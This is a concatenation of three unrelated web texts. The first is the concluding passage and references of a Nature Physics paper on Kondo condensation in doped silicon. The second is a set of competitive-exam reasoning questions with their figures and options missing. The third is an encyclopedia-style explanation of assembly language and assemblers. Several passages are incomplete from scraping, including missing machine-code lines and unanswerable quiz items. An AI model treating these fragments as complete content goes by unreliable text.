The Kondo condensation scenario proposed here can be used to reproduce the observed DOS spectra by considering the correlation effect on the spectrum of itinerant fermions. For this purpose, we introduce the charge neutral scalar field \(\varphi = < c_ \uparrow f_ \downarrow ^ + - c_ \downarrow \,f_ \uparrow ^ + >\), where c is an itinerant electron and f+ is an ion impurity with a net spin of 1/2. Kondo condensation is the configuration in which φ is non-vanishing. If we consider φ as a constant part of field φ(x), its coupling to the fermion can describe the effects of Kondo condensation on the spectrum of the fermion23. When T or B increases sufficiently, the condensation is destroyed by thermal fluctuations or by Zeeman flips; thus, the pseudogap will disappear, and the system will undergo a transition from a gapped scalar ordered state with Kondo condensation to a paramagnetic DFL state.
The calculation for the DOS spectra of this system encounters two sources of difficulty in many-body theories; that is, randomness and strong correlations. A mean-field description of the system that works even for a strongly interacting system would be helpful. One such theory is the holographic theory24,25,26, the validity of which relies on the universality of the system near the quantum critical point. The principle of holography works even after the scale symmetry is slightly broken27, similar to our situation where the scale symmetry is broken due to the presence of Kondo condensation (Supplementary Fig. 9). Figure 5a reveals the modelled pseudogap in the DOS and two DOS peaks at opposite energies, calculated at B = 0 V. A gap is clearly visible in the DOS at T = 18 mK, whereas for a larger value of T > 160 mK, the pseudogap is closed, which is in qualitative agreement with the experimental G–V curve at B = 0 G and T = 18 mK (Fig. 2d). Because there is a non-zero DOS value at EF (V = 0 V), the corresponding state is a metal. For larger magnetic fields, no strong pseudogap is present in the computed DOS (Fig. 5b). The calculated magnetic-field-dependent DOS spectra are qualitatively similar to the experimental G–V curves (Fig. 3a). In addition to our holographic model, it will be worth checking the reproducibility of our results using other theoretical approaches (Supplementary Information 10).
In conclusion, similarly shaped DOS spectra at EF have been observed in cuprate, pnictide and heavy-fermion superconductors5,6,28,29. In fact, the T–B phase diagram of our Si:P metal in Fig. 4 is also similar to that of the quantum materials listed above. This result is not a surprise because the observed pseudogap behaviours in these materials can be commonly explained by coherent electronic states with a correlation. Although a microscopic understanding of how the order parameter depends on external perturbations such as T, B, pressure, and doping is still challenging, the observation of Kondo condensation and its phase transition in degenerately doped elemental semiconductor Si will contribute to understanding other quantum materials such as Kondo lattices, spin glasses and high-TC superconductors. It would also be interesting to experimentally probe the Hall coefficient and shot noise near the quantum critical point, which are expected to display non-Fermi liquid physics30,31,32.
Sample preparation and characterization
The structural, electrical and magnetic properties of bulk Si:P metal were studied using transmission electron microscopy, secondary ion mass spectrometry, magnetoresistance and superconducting quantum interference device measurements (Supplementary Figs. 1–3). Tunnel junction devices were fabricated on a -oriented Si substrate with a P concentration of ~2.6 × 1019 cm−3. The SiO2 tunnel barrier was formed by thermal oxidation of the Si:P layer. The tunnel junction device was then completed by depositing a 200-nm-thick top Ag or Al electrode.
The datasets generated and/or analysed during this study are available from the corresponding authors on reasonable request. Source data are provided with this paper.
Codes for performing numeric calculations are available from the corresponding authors upon reasonable request.
Kroha, J. in The Physics of Correlated Insulators, Metals, and Superconductors Modeling and Simulation Series Vol. 7 (eds Pavarini, E. et al.) 12.1–12.27 (Forschungszentrum Julich, 2017).
Aoki, H. & Kamimura, H. The Physics of Interacting Electrons in Disordered Systems (Oxford Univ. Press, 1989).
Coleman, P. Introduction to Many-Body Physics (Cambridge Univ. Press, 2015).
Yang, Y.-f, Fisk, Z., Lee, H.-O., Thompson, J. D. & Pines, D. Scaling the Kondo lattice. Nature 454, 611–613 (2008).
Keimer, B., Kivelson, S. A., Norman, M. R., Uchida, S. & Zaanen, J. From quantum matter to high-temperature superconductivity in copper oxides. Nature 518, 179–186 (2015).
He, Y. et al. Fermi surface and pseudogap evolution in a cuprate superconductor. Science 344, 608–611 (2014).
Manyala, N., DiTusa, J., Appli, G. & Ramirez, A. Doping a semiconductor to create an unconventional metal. Nature 454, 976–980 (2008).
Lӧhneysen, H. V. Electron-electron interactions and the metal-insulator transition in heavily doped silicon. Ann. Phys. 523, 599–611 (2011).
Lakner, M., Löhneysen, H. V., Langenfeld, A. & Wölfle, P. Localized magnetic moments in Si:P near the metal-insulator transition. Phys. Rev. B 50, 17064–17073 (1994).
Anderson, P. W. Local moments and localized states. Rev. Mod. Phys. 50, 191–201 (1978).
Bhatt, R. N. & Lee, P. A. Scaling studies of highly disordered spin-½ antiferromagnetic systems. Phys. Rev. Lett. 48, 344–347 (1982).
Langenfeld, A. & Wölfle, P. Disorder-induced local magnetic moments in weakly correlated metallic systems. Ann. Phys. 4, 43–52 (1995).
Alexander, M. N. & Holcomb, D. F. Semiconductor-to-metal transition in n-type group IV semiconductors. Rev. Mod. Phys. 40, 815–829 (1968).
Affleck, I. in Perspectives of Mesoscopic Physics (eds Aharony, A. & Entin-Wohlman, O.) 1–44 (World Scientific, 2010).
Borzenets, I. V. et al. Observation of the Kondo screening cloud. Nature 579, 210–213 (2020).
Nakatsuji, S. et al. Intersite coupling effects in a Kondo lattice. Phys. Rev. Lett. 89, 106402 (2002).
Sluchanko, N. E. et al. Anomalies of magnetoresistance in Ce-based heavy fermion compounds. Low Temp. Phys. 41, 1011–1023 (2015).
Altshuler, B. L. & Aronov, A. G. Zero bias anomaly in tunnel resistance and electron-electron interaction. Solid State Commun. 30, 115–117 (1979).
Oppermann, R. & Rosenow, B. Magnetic gaps related to spin glass order in fermionic systems. Phys. Rev. Lett. 80, 4767–4770 (1998).
Zhang, X. et al. Hybridization, inter-ion correlation, and surface states in the Kondo insulator SmB6. Phys. Rev. X 3, 011011 (2013).
Uematsu, K. & Kawamura, H. Randomness-induced quantum spin liquid behavior in the s=1/2 random J1−J2 Heisenberg antiferromagnet on the square lattice. Phys. Rev. B 98, 134427 (2018).
Bustarret, E. et al. Superconductivity in doped cubic silicon. Nature 444, 465–468 (2006).
Fradkin, E. Field Theories of Condensed Matter Physics (Cambridge Univ. Press, 2013).
Witten, E. Anti-de Sitter space and holography. Adv. Theor. Math. Phys. 2, 253–291 (1998).
Maldacena, J. M. The large N limit of superconformal field theories and supergravity. Int. J. Theor. Phys. 38, 1113–1133 (1999).
Zaanen, J., Liu, Y., Sun, Y. & Schalm, K. Holographic Duality in Condensed Matter Physics (Cambridge Univ. Press, 2015).
Hartnoll, S. A., Herzog, C. P. & Horowitz, G. T. Building a holographic superconductor. Phys. Rev. Lett. 101, 031601 (2008).
Zhou, X. et al. Evolution from unconventional spin density wave to superconductivity and a pseudogaplike phase in NaFe1-xCoxAs. Phys. Rev. Lett. 109, 037002 (2012).
Zhou, B. B. et al. Visualizing nodal heavy fermion superconductivity in CeCoIn5. Nat. Phys. 9, 474–479 (2013).
Paschen, S. et al. Hall-effect evolution across a heavy-fermion quantum critical point. Nature 432, 881–885 (2004).
Kirchner, S., Zhu, L., Si, Q. & Natelson, D. Quantum criticality in ferromagnetic single-electron transistors. Proc. Natl Acad. Sci. USA 102, 18824–18829 (2005).
Sela, E., Oreg, Y., von Oppen, F. & Koch, J. Fractional shot noise in the Kondo regime. Phys. Rev. Lett. 97, 086601 (2006).
We thank B. Altshuler, L. Ioffe, F. Nori, H. Aoki, H. Kamimura, V. Pudalov, M. Gershenson and H.-S. Sim for useful comments. This work was supported by the National Research Foundation of Korea (grant nos. 2021R1A4A5031805 (to H.I.), 2020R1A4A4078674 (to E.K.K.), 2021R1A2C1093652 (to E.K.K.), 2021R1A2B5B02002603 (to S.-J.S.), 2022H1D3A3A01077468 (to S.-J.S. and S.M.), 2022R1F1A1072865 (to S.M.), 2022M3E4A1083527 (to Y.C.) and 2022M3E4A1077186 (to Y.C.)). J.-S.T. was supported by a funding programme for the Japanese Cabinet Office ImPACT project.
The authors declare no competing interests.
Peer review information
Nature Physics thanks the anonymous reviewers for their contribution to the peer review of this work
Publisher’s note Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
Source Data Fig. 2
Source data for Fig. 2a,b,d,e.
Source Data Fig. 3
Source data for Fig. 3a,b.
Source Data Fig. 4
Source data for Fig. 4.
Source Data Fig. 5
Source data for Fig. 5a,b.
Rights and permissions
Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons license, and indicate if changes were made. The images or other third party material in this article are included in the article’s Creative Commons license, unless indicated otherwise in a credit line to the material. If material is not included in the article’s Creative Commons license and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this license, visit http://creativecommons.org/licenses/by/4.0/.
About this article
Cite this article
Im, H., Lee, D.U., Jo, Y. et al. Observation of Kondo condensation in a degenerately doped silicon metal. Nat. Phys. (2023). https://doi.org/10.1038/s41567-022-01930-3
This article is cited by
Doped silicon’s challenging behaviour
Nature Physics (2023) | <urn:uuid:21dd82f7-bc7f-4849-9f99-af608d7941ab> | CC-MAIN-2023-14 | https://www.nature.com/articles/s41567-022-01930-3?error=cookies_not_supported&code=67f63401-e6dc-4429-a242-f5cdf2efd1a5 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296944452.74/warc/CC-MAIN-20230322180852-20230322210852-00604.warc.gz | en | 0.884352 | 6,522 | 2.625 | 3 |
For the following questions answer them individually
Select the option in which the given figure is embedded.
Which two signs should be interchanged in the following equation to make it correct?
$$18 + 6 - 6 \div 3 \times 3 = 6$$
Select the combination of letters that when sequentially placed in the gaps of the given letter series will complete the series.
Two different positions of the same dice are shown. Which number will be at the top if 6 is at the bottom?
If BACK is coded as 11312 and CAKE is coded as 51113, then how will MADE be coded as ?
Select the set in which the numbers are related in the same way as are toe numbers of the following set.
Which number will replace the question mark (?) in the following series?
2, 5, 11, 23, 44, ?
A paper is folded and cut as shown below. How will it appear when unfolded ?
`Action' is related to 'Reaction' in the same way as 'Stimulus' is related to '_____'
P is the father of Q and the grandfather of R. who is the brother of S. S's mother, T, is married to V. T is the sister of Q. How is V related to P? | <urn:uuid:00b6869e-2eda-4ae8-9dea-b46089b330e0> | CC-MAIN-2023-14 | https://cracku.in/ssc-cgl-4-june-2019-shift-2-question-paper-solved | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296946445.46/warc/CC-MAIN-20230326173112-20230326203112-00604.warc.gz | en | 0.954499 | 292 | 3 | 3 |
|Paradigm||Imperative, unstructured, often metaprogramming (through macros), certain assemblers are object-oriented and/or structured|
In computer programming, assembly language (alternatively assembler language or symbolic machine code), often referred to simply as Assembly and commonly abbreviated as ASM or asm, is any low-level programming language with a very strong correspondence between the instructions in the language and the architecture's machine code instructions. Assembly language usually has one statement per machine instruction (1:1), but constants, comments, assembler directives, symbolic labels of, e.g., memory locations, registers, and macros are generally also supported.
The first assembly code in which a language is used to represent machine code instructions is found in Kathleen and Andrew Donald Booth's 1947 work, Coding for A.R.C.. Assembly code is converted into executable machine code by a utility program referred to as an assembler. The term "assembler" is generally attributed to Wilkes, Wheeler and Gill in their 1951 book The Preparation of Programs for an Electronic Digital Computer, who, however, used the term to mean "a program that assembles another program consisting of several sections into a single program". The conversion process is referred to as assembly, as in assembling the source code. The computational step when an assembler is processing a program is called assembly time.
Because assembly depends on the machine code instructions, each assembly language[nb 1] is specific to a particular computer architecture.
Sometimes there is more than one assembler for the same architecture, and sometimes an assembler is specific to an operating system or to particular operating systems. Most assembly languages do not provide specific syntax for operating system calls, and most assembly languages can be used universally with any operating system,[nb 2] as the language provides access to all the real capabilities of the processor, upon which all system call mechanisms ultimately rest. In contrast to assembly languages, most high-level programming languages are generally portable across multiple architectures but require interpreting or compiling, much more complicated tasks than assembling.
In the first decades of computing, it was commonplace for both systems programming and application programming to take place entirely in assembly language. While still irreplaceable for some purposes, the majority of programming is now conducted in higher-level interpreted and compiled languages. In "No Silver Bullet", Fred Brooks summarised the effects of the switch away from assembly language programming: "Surely the most powerful stroke for software productivity, reliability, and simplicity has been the progressive use of high-level languages for programming. Most observers credit that development with at least a factor of five in productivity, and with concomitant gains in reliability, simplicity, and comprehensibility."
Today, it is typical to use small amounts of assembly language code within larger systems implemented in a higher-level language, for performance reasons or to interact directly with hardware in ways unsupported by the higher-level language. For instance, just under 2% of version 4.9 of the Linux kernel source code is written in assembly; more than 97% is written in C.
Assembly language syntax
Assembly language uses a mnemonic to represent, e.g., each low-level machine instruction or opcode, each directive, typically also each architectural register, flag, etc. Some of the mnemonics may be built in and some user defined. Many operations require one or more operands in order to form a complete instruction. Most assemblers permit named constants, registers, and labels for program and memory locations, and can calculate expressions for operands. Thus, programmers are freed from tedious repetitive calculations and assembler programs are much more readable than machine code. Depending on the architecture, these elements may also be combined for specific instructions or addressing modes using offsets or other data as well as fixed addresses. Many assemblers offer additional mechanisms to facilitate program development, to control the assembly process, and to aid debugging.
Some are column oriented, with specific fields in specific columns; this was very common for machines using punched cards in the 1950s and early 1960s. Some assemblers have free-form syntax, with fields separated by delimiters, e.g., punctuation, white space. Some assemblers are hybrid, with, e.g., labels, in a specific column and other fields separated by delimiters; this became more common than column oriented syntax in the 1960s.
All of the IBM assemblers for System/360, by default, have a label in column 1, fields separated by delimiters in columns 2-71, a continuation indicator in column 72 and a sequence number in columns 73-80. The delimiter for label, opcode, operands and comments is spaces, while individual operands are separated by commas and parentheses.
- A macro assembler is an assembler that includes a macroinstruction facility so that (parameterized) assembly language text can be represented by a name, and that name can be used to insert the expanded text into other code.
- Open code refers to any assembler input outside of a macro definition.
- A cross assembler (see also cross compiler) is an assembler that is run on a computer or operating system (the host system) of a different type from the system on which the resulting code is to run (the target system). Cross-assembling facilitates the development of programs for systems that do not have the resources to support software development, such as an embedded system or a microcontroller. In such a case, the resulting object code must be transferred to the target system, via read-only memory (ROM, EPROM, etc.), a programmer (when the read-only memory is integrated in the device, as in microcontrollers), or a data link using either an exact bit-by-bit copy of the object code or a text-based representation of that code (such as Intel hex or Motorola S-record).
- A high-level assembler is a program that provides language abstractions more often associated with high-level languages, such as advanced control structures (IF/THEN/ELSE, DO CASE, etc.) and high-level abstract data types, including structures/records, unions, classes, and sets.
- A microassembler is a program that helps prepare a microprogram, called firmware, to control the low level operation of a computer.
- A meta-assembler is "a program that accepts the syntactic and semantic description of an assembly language, and generates an assembler for that language", or that accepts an assembler source file along with such a description and assembles the source file in accordance with that description. "Meta-Symbol" assemblers for the SDS 9 Series and SDS Sigma series of computers are meta-assemblers.[nb 3] Sperry Univac also provided a Meta-Assembler for the UNIVAC 1100/2200 series.
- inline assembler (or embedded assembler) is assembler code contained within a high-level language program. This is most often used in systems programs which need direct access to the hardware.
An assembler program creates object code by translating combinations of mnemonics and syntax for operations and addressing modes into their numerical equivalents. This representation typically includes an operation code ("opcode") as well as other control bits and data. The assembler also calculates constant expressions and resolves symbolic names for memory locations and other entities. The use of symbolic references is a key feature of assemblers, saving tedious calculations and manual address updates after program modifications. Most assemblers also include macro facilities for performing textual substitution – e.g., to generate common short sequences of instructions as inline, instead of called subroutines.
Some assemblers may also be able to perform some simple types of instruction set-specific optimizations. One concrete example of this may be the ubiquitous x86 assemblers from various vendors. Called jump-sizing, most of them are able to perform jump-instruction replacements (long jumps replaced by short or relative jumps) in any number of passes, on request. Others may even do simple rearrangement or insertion of instructions, such as some assemblers for RISC architectures that can help optimize a sensible instruction scheduling to exploit the CPU pipeline as efficiently as possible.
Assemblers have been available since the 1950s, as the first step above machine language and before high-level programming languages such as Fortran, Algol, COBOL and Lisp. There have also been several classes of translators and semi-automatic code generators with properties similar to both assembly and high-level languages, with Speedcode as perhaps one of the better-known examples.
There may be several assemblers with different syntax for a particular CPU or instruction set architecture. For instance, an instruction to add memory data to a register in a x86-family processor might be
add eax,[ebx], in original Intel syntax, whereas this would be written
addl (%ebx),%eax in the AT&T syntax used by the GNU Assembler. Despite different appearances, different syntactic forms generally generate the same numeric machine code. A single assembler may also have different modes in order to support variations in syntactic forms as well as their exact semantic interpretations (such as FASM-syntax, TASM-syntax, ideal mode, etc., in the special case of x86 assembly programming).
Number of passes
There are two types of assemblers based on how many passes through the source are needed (how many times the assembler reads the source) to produce the object file.
- One-pass assemblers process the source code once. For symbols used before they are defined, the assembler will emit "errata" after the eventual definition, telling the linker or the loader to patch the locations where the as yet undefined symbols had been used.
- Multi-pass assemblers create a table with all symbols and their values in the first passes, then use the table in later passes to generate code.
In both cases, the assembler must be able to determine the size of each instruction on the initial passes in order to calculate the addresses of subsequent symbols. This means that if the size of an operation referring to an operand defined later depends on the type or distance of the operand, the assembler will make a pessimistic estimate when first encountering the operation, and if necessary, pad it with one or more "no-operation" instructions in a later pass or the errata. In an assembler with peephole optimization, addresses may be recalculated between passes to allow replacing pessimistic code with code tailored to the exact distance from the target.
The original reason for the use of one-pass assemblers was memory size and speed of assembly – often a second pass would require storing the symbol table in memory (to handle forward references), rewinding and rereading the program source on tape, or rereading a deck of cards or punched paper tape. Later computers with much larger memories (especially disc storage), had the space to perform all necessary processing without such re-reading. The advantage of the multi-pass assembler is that the absence of errata makes the linking process (or the program load if the assembler directly produces executable code) faster.
Example: in the following code snippet, a one-pass assembler would be able to determine the address of the backward reference BKWD when assembling statement S2, but would not be able to determine the address of the forward reference FWD when assembling the branch statement S1; indeed, FWD may be undefined. A two-pass assembler would determine both addresses in pass 1, so they would be known when generating code in pass 2.
S1 B FWD ... FWD EQU * ... BKWD EQU * ... S2 B BKWD
More sophisticated high-level assemblers provide language abstractions such as:
- High-level procedure/function declarations and invocations
- Advanced control structures (IF/THEN/ELSE, SWITCH)
- High-level abstract data types, including structures/records, unions, classes, and sets
- Sophisticated macro processing (although available on ordinary assemblers since the late 1950s for, e.g., the IBM 700 series and IBM 7000 series, and since the 1960s for IBM System/360 (S/360), amongst other machines)
- Object-oriented programming features such as classes, objects, abstraction, polymorphism, and inheritance
See Language design below for more details.
A program written in assembly language consists of a series of mnemonic processor instructions and meta-statements (known variously as declarative operations, directives, pseudo-instructions, pseudo-operations and pseudo-ops), comments and data. Assembly language instructions usually consist of an opcode mnemonic followed by an operand, which might be a list of data, arguments or parameters. Some instructions may be "implied," which means the data upon which the instruction operates is implicitly defined by the instruction itself—such an instruction does not take an operand. The resulting statement is translated by an assembler into machine language instructions that can be loaded into memory and executed.
For example, the instruction below tells an x86/IA-32 processor to move an immediate 8-bit value into a register. The binary code for this instruction is 10110 followed by a 3-bit identifier for which register to use. The identifier for the AL register is 000, so the following machine code loads the AL register with the data 01100001.
This binary computer code can be made more human-readable by expressing it in hexadecimal as follows.
B0 means 'Move a copy of the following value into AL, and
61 is a hexadecimal representation of the value 01100001, which is 97 in decimal. Assembly language for the 8086 family provides the mnemonic MOV (an abbreviation of move) for instructions such as this, so the machine code above can be written as follows in assembly language, complete with an explanatory comment if required, after the semicolon. This is much easier to read and to remember.
MOV AL, 61h ; Load AL with 97 decimal (61 hex)
In some assembly languages (including this one) the same mnemonic, such as MOV, may be used for a family of related instructions for loading, copying and moving data, whether these are immediate values, values in registers, or memory locations pointed to by values in registers or by immediate (a.k.a. direct) addresses. Other assemblers may use separate opcode mnemonics such as L for "move memory to register", ST for "move register to memory", LR for "move register to register", MVI for "move immediate operand to memory", etc.
If the same mnemonic is used for different instructions, that means that the mnemonic corresponds to several different binary instruction codes, excluding data (e.g. the
61h in this example), depending on the operands that follow the mnemonic. For example, for the x86/IA-32 CPUs, the Intel assembly language syntax
MOV AL, AH represents an instruction that moves the contents of register AH into register AL. The[nb 4] hexadecimal form of this instruction is:
The first byte, 88h, identifies a move between a byte-sized register and either another register or memory, and the second byte, E0h, is encoded (with three bit-fields) to specify that both operands are registers, the source is AH, and the destination is AL.
In a case like this where the same mnemonic can represent more than one binary instruction, the assembler determines which instruction to generate by examining the operands. In the first example, the operand
61h is a valid hexadecimal numeric constant and is not a valid register name, so only the
B0 instruction can be applicable. In the second example, the operand
AH is a valid register name and not a valid numeric constant (hexadecimal, decimal, octal, or binary), so only the
88 instruction can be applicable.
Assembly languages are always designed so that this sort of unambiguousness is universally enforced by their syntax. For example, in the Intel x86 assembly language, a hexadecimal constant must start with a numeral digit, so that the hexadecimal number 'A' (equal to decimal ten) would be written as
AH, specifically so that it cannot appear to be the name of register AH. (The same rule also prevents ambiguity with the names of registers BH, CH, and DH, as well as with any user-defined symbol that ends with the letter H and otherwise contains only characters that are hexadecimal digits, such as the word "BEACH".)
Returning to the original example, while the x86 opcode 10110000 (
B0) copies an 8-bit value into the AL register, 10110001 (
B1) moves it into CL and 10110010 (
B2) does so into DL. Assembly language examples for these follow.
MOV AL, 1h ; Load AL with immediate value 1 MOV CL, 2h ; Load CL with immediate value 2 MOV DL, 3h ; Load DL with immediate value 3
The syntax of MOV can also be more complex as the following examples show.
MOV EAX, [EBX] ; Move the 4 bytes in memory at the address contained in EBX into EAX MOV [ESI+EAX], CL ; Move the contents of CL into the byte at address ESI+EAX MOV DS, DX ; Move the contents of DX into segment register DS
In each case, the MOV mnemonic is translated directly into one of the opcodes 88-8C, 8E, A0-A3, B0-BF, C6 or C7 by an assembler, and the programmer normally does not have to know or remember which.
Transforming assembly language into machine code is the job of an assembler, and the reverse can at least partially be achieved by a disassembler. Unlike high-level languages, there is a one-to-one correspondence between many simple assembly statements and machine language instructions. However, in some cases, an assembler may provide pseudoinstructions (essentially macros) which expand into several machine language instructions to provide commonly needed functionality. For example, for a machine that lacks a "branch if greater or equal" instruction, an assembler may provide a pseudoinstruction that expands to the machine's "set if less than" and "branch if zero (on the result of the set instruction)". Most full-featured assemblers also provide a rich macro language (discussed below) which is used by vendors and programmers to generate more complex code and data sequences. Since the information about pseudoinstructions and macros defined in the assembler environment is not present in the object program, a disassembler cannot reconstruct the macro and pseudoinstruction invocations but can only disassemble the actual machine instructions that the assembler generated from those abstract assembly-language entities. Likewise, since comments in the assembly language source file are ignored by the assembler and have no effect on the object code it generates, a disassembler is always completely unable to recover source comments.
Each computer architecture has its own machine language. Computers differ in the number and type of operations they support, in the different sizes and numbers of registers, and in the representations of data in storage. While most general-purpose computers are able to carry out essentially the same functionality, the ways they do so differ; the corresponding assembly languages reflect these differences.
Multiple sets of mnemonics or assembly-language syntax may exist for a single instruction set, typically instantiated in different assembler programs. In these cases, the most popular one is usually that supplied by the CPU manufacturer and used in its documentation.
Two examples of CPUs that have two different sets of mnemonics are the Intel 8080 family and the Intel 8086/8088. Because Intel claimed copyright on its assembly language mnemonics (on each page of their documentation published in the 1970s and early 1980s, at least), some companies that independently produced CPUs compatible with Intel instruction sets invented their own mnemonics. The Zilog Z80 CPU, an enhancement of the Intel 8080A, supports all the 8080A instructions plus many more; Zilog invented an entirely new assembly language, not only for the new instructions but also for all of the 8080A instructions. For example, where Intel uses the mnemonics MOV, MVI, LDA, STA, LXI, LDAX, STAX, LHLD, and SHLD for various data transfer instructions, the Z80 assembly language uses the mnemonic LD for all of them. A similar case is the NEC V20 and V30 CPUs, enhanced copies of the Intel 8086 and 8088, respectively. Like Zilog with the Z80, NEC invented new mnemonics for all of the 8086 and 8088 instructions, to avoid accusations of infringement of Intel's copyright. (It is questionable whether such copyrights can be valid, and later CPU companies such as AMD[nb 5] and Cyrix republished Intel's x86/IA-32 instruction mnemonics exactly with neither permission nor legal penalty.) It is doubtful whether in practice many people who programmed the V20 and V30 actually wrote in NEC's assembly language rather than Intel's; since any two assembly languages for the same instruction set architecture are isomorphic (somewhat like English and Pig Latin), there is no requirement to use a manufacturer's own published assembly language with that manufacturer's products.
There is a large degree of diversity in the way the authors of assemblers categorize statements and in the nomenclature that they use. In particular, some describe anything other than a machine mnemonic or extended mnemonic as a pseudo-operation (pseudo-op). A typical assembly language consists of 3 types of instruction statements that are used to define program operations:
- Opcode mnemonics
- Data definitions
- Assembly directives
Opcode mnemonics and extended mnemonics
Instructions (statements) in assembly language are generally very simple, unlike those in high-level languages. Generally, a mnemonic is a symbolic name for a single executable machine language instruction (an opcode), and there is at least one opcode mnemonic defined for each machine language instruction. Each instruction typically consists of an operation or opcode plus zero or more operands. Most instructions refer to a single value or a pair of values. Operands can be immediate (value coded in the instruction itself), registers specified in the instruction or implied, or the addresses of data located elsewhere in storage. This is determined by the underlying processor architecture: the assembler merely reflects how this architecture works. Extended mnemonics are often used to specify a combination of an opcode with a specific operand, e.g., the System/360 assemblers use
B as an extended mnemonic for
BC with a mask of 15 and
NOP ("NO OPeration" – do nothing for one step) for
BC with a mask of 0.
Extended mnemonics are often used to support specialized uses of instructions, often for purposes not obvious from the instruction name. For example, many CPU's do not have an explicit NOP instruction, but do have instructions that can be used for the purpose. In 8086 CPUs the instruction
xchg ax,ax is used for
nop being a pseudo-opcode to encode the instruction
xchg ax,ax. Some disassemblers recognize this and will decode the
xchg ax,ax instruction as
nop. Similarly, IBM assemblers for System/360 and System/370 use the extended mnemonics
BCR with zero masks. For the SPARC architecture, these are known as synthetic instructions.
Some assemblers also support simple built-in macro-instructions that generate two or more machine instructions. For instance, with some Z80 assemblers the instruction
ld hl,bc is recognized to generate
ld l,c followed by
ld h,b. These are sometimes known as pseudo-opcodes.
Mnemonics are arbitrary symbols; in 1985 the IEEE published Standard 694 for a uniform set of mnemonics to be used by all assemblers. The standard has since been withdrawn.
There are instructions used to define data elements to hold data and variables. They define the type of data, the length and the alignment of data. These instructions can also define whether the data is available to outside programs (programs assembled separately) or only to the program in which the data section is defined. Some assemblers classify these as pseudo-ops.
Assembly directives, also called pseudo-opcodes, pseudo-operations or pseudo-ops, are commands given to an assembler "directing it to perform operations other than assembling instructions". Directives affect how the assembler operates and "may affect the object code, the symbol table, the listing file, and the values of internal assembler parameters". Sometimes the term pseudo-opcode is reserved for directives that generate object code, such as those that generate data.
The names of pseudo-ops often start with a dot to distinguish them from machine instructions. Pseudo-ops can make the assembly of the program dependent on parameters input by a programmer, so that one program can be assembled in different ways, perhaps for different applications. Or, a pseudo-op can be used to manipulate presentation of a program to make it easier to read and maintain. Another common use of pseudo-ops is to reserve storage areas for run-time data and optionally initialize their contents to known values.
Symbolic assemblers let programmers associate arbitrary names (labels or symbols) with memory locations and various constants. Usually, every constant and variable is given a name so instructions can reference those locations by name, thus promoting self-documenting code. In executable code, the name of each subroutine is associated with its entry point, so any calls to a subroutine can use its name. Inside subroutines, GOTO destinations are given labels. Some assemblers support local symbols which are often lexically distinct from normal symbols (e.g., the use of "10$" as a GOTO destination).
Some assemblers, such as NASM, provide flexible symbol management, letting programmers manage different namespaces, automatically calculate offsets within data structures, and assign labels that refer to literal values or the result of simple computations performed by the assembler. Labels can also be used to initialize constants and variables with relocatable addresses.
Assembly languages, like most other computer languages, allow comments to be added to program source code that will be ignored during assembly. Judicious commenting is essential in assembly language programs, as the meaning and purpose of a sequence of binary machine instructions can be difficult to determine. The "raw" (uncommented) assembly language generated by compilers or disassemblers is quite difficult to read when changes must be made.
Many assemblers support predefined macros, and others support programmer-defined (and repeatedly re-definable) macros involving sequences of text lines in which variables and constants are embedded. The macro definition is most commonly[nb 6] a mixture of assembler statements, e.g., directives, symbolic machine instructions, and templates for assembler statements. This sequence of text lines may include opcodes or directives. Once a macro has been defined its name may be used in place of a mnemonic. When the assembler processes such a statement, it replaces the statement with the text lines associated with that macro, then processes them as if they existed in the source code file (including, in some assemblers, expansion of any macros existing in the replacement text). Macros in this sense date to IBM autocoders of the 1950s.[nb 7]
Macro assemblers typically have directives to, e.g., define macros, define variables, set variables to the result of an arithmetic, logical or string expression, iterate, conditionally generate code. Some of those directives may be restricted to use within a macro definition, e.g., MEXIT in HLASM, while others may be permitted within open code (outside macro definitions), e.g., AIF and COPY in HLASM.
In assembly language, the term "macro" represents a more comprehensive concept than it does in some other contexts, such as the pre-processor in the C programming language, where its #define directive typically is used to create short single line macros. Assembler macro instructions, like macros in PL/I and some other languages, can be lengthy "programs" by themselves, executed by interpretation by the assembler during assembly.
Since macros can have 'short' names but expand to several or indeed many lines of code, they can be used to make assembly language programs appear to be far shorter, requiring fewer lines of source code, as with higher level languages. They can also be used to add higher levels of structure to assembly programs, optionally introduce embedded debugging code via parameters and other similar features.
Macro assemblers often allow macros to take parameters. Some assemblers include quite sophisticated macro languages, incorporating such high-level language elements as optional parameters, symbolic variables, conditionals, string manipulation, and arithmetic operations, all usable during the execution of a given macro, and allowing macros to save context or exchange information. Thus a macro might generate numerous assembly language instructions or data definitions, based on the macro arguments. This could be used to generate record-style data structures or "unrolled" loops, for example, or could generate entire algorithms based on complex parameters. For instance, a "sort" macro could accept the specification of a complex sort key and generate code crafted for that specific key, not needing the run-time tests that would be required for a general procedure interpreting the specification. An organization using assembly language that has been heavily extended using such a macro suite can be considered to be working in a higher-level language since such programmers are not working with a computer's lowest-level conceptual elements. Underlining this point, macros were used to implement an early virtual machine in SNOBOL4 (1967), which was written in the SNOBOL Implementation Language (SIL), an assembly language for a virtual machine. The target machine would translate this to its native code using a macro assembler. This allowed a high degree of portability for the time.
Macros were used to customize large scale software systems for specific customers in the mainframe era and were also used by customer personnel to satisfy their employers' needs by making specific versions of manufacturer operating systems. This was done, for example, by systems programmers working with IBM's Conversational Monitor System / Virtual Machine (VM/CMS) and with IBM's "real time transaction processing" add-ons, Customer Information Control System CICS, and ACP/TPF, the airline/financial system that began in the 1970s and still runs many large computer reservation systems (CRS) and credit card systems today.
It is also possible to use solely the macro processing abilities of an assembler to generate code written in completely different languages, for example, to generate a version of a program in COBOL using a pure macro assembler program containing lines of COBOL code inside assembly time operators instructing the assembler to generate arbitrary code. IBM OS/360 uses macros to perform system generation. The user specifies options by coding a series of assembler macros. Assembling these macros generates a job stream to build the system, including job control language and utility control statements.
This is because, as was realized in the 1960s, the concept of "macro processing" is independent of the concept of "assembly", the former being in modern terms more word processing, text processing, than generating object code. The concept of macro processing appeared, and appears, in the C programming language, which supports "preprocessor instructions" to set variables, and make conditional tests on their values. Unlike certain previous macro processors inside assemblers, the C preprocessor is not Turing-complete because it lacks the ability to either loop or "go to", the latter allowing programs to loop.
